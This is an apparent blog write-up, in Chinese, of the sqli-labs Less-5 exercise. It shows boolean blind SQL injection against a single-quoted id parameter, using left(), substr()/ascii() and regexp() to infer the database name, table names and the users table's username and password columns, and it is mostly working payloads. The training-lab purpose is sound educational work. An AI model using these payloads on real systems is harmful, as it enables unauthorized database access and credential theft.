zoukankan      html  css  js  c++  java
  • Less5-Less6

    Less-5

    字符型_单引号_盲注

    0x01 left()

    left(database(),1)
    #left(a,b)截取字符串a的自左向右的b个字符
    
    ?id=1' and left(version(),1)=5--+
    

    判断版本号第一个是否为5,若是,则youarein

    若不是,则

    查看数据库长度,长度为8

    ?id=1' and length(database())=8--+
    


    猜测数据库第一个字符是否大于a

    ?id=1' and left(database(),1)>'a'--+
    


    猜测数据库的前两个字符是否大于sa,直到判断出数据库名为security

    ?id=1' and left(database(),2)>'sa'--+
    

    0x02 substr()

    substr(string,start,length)
    #start开始,截取长度为length
    

    猜测表名,通过ascii,substr()函数,判断第一个表名的第一个字符,得出表email中的e

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=101--+
    


    判断第二个字符,为m,直到判断出第一个表为email

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=109--+
    


    判断第二个表,修改limit 1,1,直到判断出所有的表名

    ?id=1' and ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=114--+
    

    0x03 regexp()

    regexp '^[a-z]'limit 0,1
    #判断第一个字符为a-z中之一,若是则返回1,否则返回0
    

    判断列名,

    ?id=1' and 1=(select 1 from information_schema.columns where table_name='users'and column_name regexp '^us[a-z]'limit 0,1)--+
    

    判断第一个列名为username

    ?id=1' and 1=(select 1 from information_schema.columns where table_name='users'and column_name regexp '^username'limit 0,1)--+
    

    判断第二个列名为password

    ?id=1' and 1=(select 1 from information_schema.columns where table_name='users'and column_name regexp '^password'limit 0,1)--+
    

    0x04 ord(),mid()

  • 相关阅读:
    HUST 1372 marshmallow
    HUST 1371 Emergency relief
    CodeForces 629D Babaei and Birthday Cake
    CodeForces 629C Famil Door and Brackets
    ZOJ 3872 Beauty of Array
    ZOJ 3870 Team Formation
    HDU 5631 Rikka with Graph
    HDU 5630 Rikka with Chess
    CodeForces 626D Jerry's Protest
    【POJ 1964】 City Game
  • 原文地址:https://www.cnblogs.com/observering/p/13443105.html
Copyright © 2011-2022 走看看